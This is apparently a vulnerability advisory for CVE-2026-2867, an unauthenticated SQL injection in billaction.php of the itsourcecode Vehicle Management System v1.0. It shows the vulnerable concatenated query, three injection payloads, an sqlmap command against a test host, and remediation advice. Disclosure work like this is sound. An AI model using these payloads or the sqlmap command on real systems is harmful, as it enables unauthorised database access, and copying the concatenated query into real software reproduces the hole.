itsourcecode ehicle-management-system-project V1.0 SQL Injection Vulnerability CVE-2026-2867

[wan1yan]

itsourcecode ehicle-management-system-project V1.0 SQL Injection Vulnerability

NAME OF AFFECTED PRODUCT(S):

• Vehicle Management System Project

Vendor Homepage :

• https://itsourcecode.com/free-projects/php-project/vehicle-management-system-project-in-php-free-download/

AFFECTED AND/OR FIXED VERSION(S):

• v1.0

Vuldb Submitter:

• wanyan

Vulnerable File:

• ~billaction.php

VERSION(S):

• v1.0

Vulnerability Type:

• SQL Injection

SQL Injection Root Cause:

• The root cause of this vulnerability lies in unsafe dynamic SQL statement construction. The program directly embeds user input from $_GET['id'] and $_POST into SQL instructions through string concatenation, without undergoing any form of filtering, escaping, or parameterization.

• vulnerability snippet:

$sql="INSERT INTO `tripcost`(`booking_id`,`username`, `total_km`, `oil_cost`, `extra_cost`, `total_cost`) VALUES ('$id','$username','$total_km','$oil_cost','$extra_cost','$total_cost')";

DESCRIPTION

The Vehicle Management System Project V1.0 is vulnerable to a critical SQL Injection vulnerability located in the billaction.php file.

The application implements a billing functionality that processes trip costs; however, it fails to perform adequate security validation on user-supplied data. The script retrieves the id parameter via a GET request and multiple variables (including username, total_km, oil_cost, extra_cost, and total_cost) via POST requests. These values are directly concatenated into an INSERT SQL statement without any sanitization or the use of parameterized queries.

POC：

Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=1' RLIKE (SELECT (CASE WHEN (3561=3561) THEN 1 ELSE 0x28 END)) AND 'elPB'='elPB

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: id=1' AND EXTRACTVALUE(5861,CONCAT(0x5c,0x7170706b71,(SELECT (ELT(5861=5861,1))),0x7176716a71)) AND 'AIsC'='AIsC

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 4196 FROM (SELECT(SLEEP(5)))IIwM) AND 'lXlt'='lXlt

NO AUTHENTICATION REQUIRED

• Exploitation requires no authentication or prior access to the system.

The following are screenshots of some specific Managemen obtained from testing and running with the sqlmap tool:

python3 sqlmap.py -u "http://192.168.1.29:8081/Vehicle-Management/billaction.php?id=1" \

--data "total_km=11&oil_cost=1&extra_cost=1&total_cost=1&username=test&submit=submit" \

-p id --batch

Remediation

1. Remediation for SQL Injection: Use Prepared Statements
   Recommendation: Strictly prohibit the construction of SQL queries through string concatenation. Implement Prepared Statements and Parameterized Queries using the mysqli or PDO extension.

Implementation: Utilize mysqli_prepare() to define the SQL template and mysqli_stmt_bind_param() to bind user-supplied variables.

Result: This ensures that user input is treated as literal data rather than executable code, effectively neutralizing SQL injection threats.

2. Remediation for Broken Access Control: Enforce Authentication
   Recommendation: Implement a robust Session Validation mechanism at the beginning of the billaction.php script.

Implementation: Verify the existence and validity of the user's session (e.g., $_SESSION['admin_id']). If the session is missing or invalid, the script must terminate execution immediately using exit() and redirect the user to the login interface.

Result: This prevents unauthenticated attackers from bypassing the UI to directly invoke backend database operations.